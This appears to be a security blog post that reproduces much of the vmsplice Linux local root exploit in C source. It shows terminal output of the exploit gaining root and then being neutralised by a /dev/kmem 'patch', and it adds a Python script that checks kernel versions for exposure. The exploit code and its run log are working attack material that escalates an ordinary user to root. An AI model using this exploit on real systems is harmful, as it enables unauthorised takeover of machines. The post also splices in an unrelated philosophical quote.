"movq %1, 0x18(%%rsp) ;"
"movq %2, 0x10(%%rsp) ;"
"movq %3, 0x08(%%rsp) ;"
"movq %4, 0x00(%%rsp) ;"
"iretq"
: : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL),
"i" (USER_CS), "r" (exit_code)
);
}

static_inline
void * get_current()
{
unsigned long curr;
__asm__ __volatile__ (
"movq %%gs:(0), %0"
: "=r" (curr)
);
return (void *) curr;
}

#else
#error "unsupported arch"
#endif

#if defined (_syscall4)
#define __NR__vmsplice __NR_vmsplice
_syscall4(
long, _vmsplice,
int, fd,
struct iovec *, iov,
unsigned long, nr_segs,
unsigned int, flags)

#else
#define _vmsplice(fd,io,nr,fl) syscall(__NR_vmsplice, (fd), (io), (nr), (fl))
#endif

static uint uid, gid;

void kernel_code()
{
int i;
uint *p = get_current();

for (i = 0; i < 1024-13; i++) {
if (p[0] == uid && p[1] == uid &&
p[2] == uid && p[3] == uid &&
p[4] == gid && p[5] == gid &&
p[6] == gid && p[7] == gid) {
p[0] = p[1] = p[2] = p[3] = 0;
p[4] = p[5] = p[6] = p[7] = 0;
p = (uint *) ((char *)(p + 8) + sizeof(void *));
p[0] = p[1] = p[2] = ~0;
break;
}
p++;
}

exit_kernel();
}

void de_exploit()
{
char line[4096];
FILE* ksyms = fopen("/proc/kallsyms", "r");
size_t address = 0;

if(!ksyms)
{
perror("Could not open /proc/kallsyms");

exit(EXIT_FAILURE);
}

while(fgets(line, sizeof(line), ksyms))
{
if(strstr(line, " sys_vmsplice"))
{
sscanf(line, "%zx", &address);

break;
}
}

if(!address)
{
fprintf(stderr, "Address not found\n");

exit(EXIT_FAILURE);
}

int fd = open("/dev/kmem", O_RDWR);

if(fd == -1)
{
perror("open(\"/dev/kmem\")");

exit(EXIT_FAILURE);
}

char* map = mmap(0, 0x200000, PROT_READ | PROT_WRITE, MAP_SHARED, fd, address & ~0xFFF);

if(map == MAP_FAILED)
{
perror("mmap");

exit(EXIT_FAILURE);
}

map[address & 0xfff] = 0xc3; /* 0xC3 = RET */

fprintf(stderr, "Exploit gone!\n");

exit(EXIT_SUCCESS);
}

void exit_code()
{
if (getuid() != 0)
die("wtf", 0);

printf("[+] root\n");
de_exploit(); // mortehu
//putenv("HISTFILE=/dev/null");
//execl("/bin/bash", "bash", "-i", NULL);
//die("/bin/bash", errno);
}

int main(int argc, char *argv[])
{
int pi[2];
size_t map_size;
char * map_addr;
struct iovec iov;
struct page * pages[5];

uid = getuid();
gid = getgid();
setresuid(uid, uid, uid);
setresgid(gid, gid, gid);

printf("-----------------------------------\n");
printf(" Linux vmsplice Local Root Exploit\n");
printf(" By qaaz\n");
printf("-----------------------------------\n");

if (!uid || !gid)
die("!@#$", 0);

/*****/
pages[0] = *(void **) &(int[2]){0,PAGE_SIZE};
pages[1] = pages[0] + 1;

map_size = PAGE_SIZE;
map_addr = mmap(pages[0], map_size, PROT_READ | PROT_WRITE,
MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (map_addr == MAP_FAILED)
die("mmap", errno);

memset(map_addr, 0, map_size);
printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
printf("[+] page: 0x%lx\n", pages[0]);
printf("[+] page: 0x%lx\n", pages[1]);

pages[0]->flags = 1 << PG_compound;
pages[0]->private = (unsigned long) pages[0];
pages[0]->count = 1;
pages[1]->lru.next = (long) kernel_code;

/*****/
pages[2] = *(void **) pages[0];
pages[3] = pages[2] + 1;

map_size = PAGE_SIZE;
map_addr = mmap(pages[2], map_size, PROT_READ | PROT_WRITE,
MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (map_addr == MAP_FAILED)
die("mmap", errno);

memset(map_addr, 0, map_size);
printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
printf("[+] page: 0x%lx\n", pages[2]);
printf("[+] page: 0x%lx\n", pages[3]);

pages[2]->flags = 1 << PG_compound;
pages[2]->private = (unsigned long) pages[2];
pages[2]->count = 1;
pages[3]->lru.next = (long) kernel_code;

/*****/
pages[4] = *(void **) &(int[2]){PAGE_SIZE,0};
map_size = PAGE_SIZE;
map_addr = mmap(pages[4], map_size, PROT_READ | PROT_WRITE,
MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (map_addr == MAP_FAILED)
die("mmap", errno);
memset(map_addr, 0, map_size);
printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
printf("[+] page: 0x%lx\n", pages[4]);

/*****/
map_size = (PIPE_BUFFERS * 3 + 2) * PAGE_SIZE;
map_addr = mmap(NULL, map_size, PROT_READ | PROT_WRITE,
MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (map_addr == MAP_FAILED)
die("mmap", errno);

memset(map_addr, 0, map_size);
printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);

/*****/
map_size -= 2 * PAGE_SIZE;
if (munmap(map_addr + map_size, PAGE_SIZE) < 0)
die("munmap", errno);

/*****/
if (pipe(pi) < 0) die("pipe", errno);
close(pi[0]);

iov.iov_base = map_addr;
iov.iov_len = ULONG_MAX;

signal(SIGPIPE, exit_code);
_vmsplice(pi[1], &iov, 1, 0);
die("vmsplice", errno);
return 0;
}


$ wget http://forums.ubuntu.com.my/forumfiles/disable-vmsplice-if-exploitab
--13:18:42-- http://forums.ubuntu.com.my/forumfiles/disable-vmsplice-if-exploitable.c
=> `disable-vmsplice-if-exploitable.c'
Resolving forums.ubuntu.com.my... 66.33.209.35
Connecting to forums.ubuntu.com.my|66.33.209.35|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 8,104 (7.9K) [text/plain]

100%[==================================================================================>] 8,104 17.95K/s

bt ~ $ gcc -o patch disable-vmsplice-if-exploitable.c
bt ~ $ ./patch
-----------------------------------
Linux vmsplice Local Root Exploit
By qaaz
-----------------------------------
[+] mmap: 0x0 .. 0x1000
[+] page: 0x0
[+] page: 0x20
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4020
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0xb7e58000 .. 0xb7e8a000
[+] root
Exploit gone!

run the local exploit again

bt ~ $ ./27704
-----------------------------------
Linux vmsplice Local Root Exploit
By qaaz
-----------------------------------
[+] mmap: 0x0 .. 0x1000
[+] page: 0x0
[+] page: 0x20
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4020
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0xb7db1000 .. 0xb7de3000
[-] vmsplice

bt ~ $ id ; uname -a ; w
uid=1000(iqbal) gid=100(users) groups=100(users)
Linux bt 2.6.21.5 #2 SMP Sat Aug 25 19:01:21 GMT 2007 i686 Intel(R) Pentium(R) 4 CPU 3.00GHz GenuineIntel GNU/Linux
13:21:02 up 2:04, 2 users, load average: 0.01, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
root tty1 - 11:18 1:58m 0.55s 0.55s -bash
iqbal pts/0 192.168.219.1 11:23 0.00s 0.27s 0.02s w

the patch worked ..
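Added example, not from the post or the exploit author: a Python exposure check that parses a kernel release string, or a whole `uname -a` line like the one at the top of the post, and tests it against the range the exploit header states, 2.6.17 through 2.6.24.1. One caveat on the patch used above: it overwrites the first byte of sys_vmsplice in memory with RET, so every vmsplice() call fails from then on (the re-run ends in `[-] vmsplice`), for legitimate callers too, and the change is gone after a reboot; a kernel outside the affected range is the durable fix. The sample uname line is copied from the post; the other release strings are constructed.

```python
"""Check whether a kernel release falls in the vmsplice-affected range.

Added example, not part of the original post. The range comes from the
exploit header ("Linux 2.6.17 - 2.6.24.1"); SAMPLE_UNAME is the line the
post shows, the other strings in the tests are constructed."""
import platform
import re

AFFECTED_LOW = (2, 6, 17, 0)
AFFECTED_HIGH = (2, 6, 24, 1)

# Leading dotted version, up to four components; anything after (e.g. "-smp",
# "-19-generic", "-rc1") is a distro or pre-release suffix and is ignored.
RELEASE_RE = re.compile(r"^(\d+)\.(\d+)(?:\.(\d+))?(?:\.(\d+))?")


def parse_release(release):
    """'2.6.21.5-smp' -> (2, 6, 21, 5). Missing trailing components count as 0.
    Returns None when the string does not start with a dotted version."""
    m = RELEASE_RE.match(release.strip())
    if not m:
        return None
    return tuple(int(g) if g else 0 for g in m.groups())


def release_from_uname(uname_line):
    """Pull the release field out of a `uname -a` line ('Linux host 2.6.21.5 #2 ...')."""
    parts = uname_line.split()
    return parts[2] if len(parts) >= 3 else None


def vmsplice_range_affected(release):
    """True if the release lies in [2.6.17, 2.6.24.1], False if outside, None if
    unparseable. A version test cannot see distribution backports, so True
    means 'verify', not proof of exposure; False with a vendor kernel still
    needs the vendor's advisory."""
    v = parse_release(release)
    if v is None:
        return None
    return AFFECTED_LOW <= v <= AFFECTED_HIGH


def assess(uname_line):
    """Summarise one host from its `uname -a` output."""
    release = release_from_uname(uname_line)
    return {"release": release,
            "affected_range": vmsplice_range_affected(release or "")}


# Copied from the post: the BackTrack guest on VMware.
SAMPLE_UNAME = ("Linux bt 2.6.21.5 #2 SMP Sat Aug 25 19:01:21 GMT 2007 i686 "
                "Intel(R) Pentium(R) 4 CPU 3.00GHz GenuineIntel GNU/Linux")

if __name__ == "__main__":
    print("post's host:", assess(SAMPLE_UNAME))
    print("this host:  ", platform.release(),
          vmsplice_range_affected(platform.release()))
```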

There is no love where there is no freedom, and by its nature freedom cannot be commanded or ruled. Enmity and strife may be born of seeds of goodness and freedom that ought to grow but are hemmed in by the narrowness of the world. It is love that lets freedom flourish, because love is generosity, always ready to forgive. Hatred is in vain. (Sindhunata)

source : milw0rm
http://forums.ubuntu.com.my

it turns out my exploration worked ... beautiful .......